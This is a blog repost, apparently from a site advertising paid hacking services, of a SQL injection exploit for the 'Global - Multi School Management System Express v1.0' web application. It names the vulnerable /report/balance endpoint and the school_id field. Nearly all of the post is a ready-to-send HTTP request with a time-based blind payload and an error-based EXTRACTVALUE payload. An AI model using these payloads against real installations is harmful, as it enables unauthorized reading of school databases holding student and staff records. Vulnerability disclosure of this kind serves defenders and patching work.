Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863103170

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
POST /report/balance HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://localhost
Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f
Content-Length: 472
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"

------------YWJkMTQzNDcw--

### Parameter & Payloads ###
Parameter: MULTIPART school_id ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"

------------YWJkMTQzNDcw–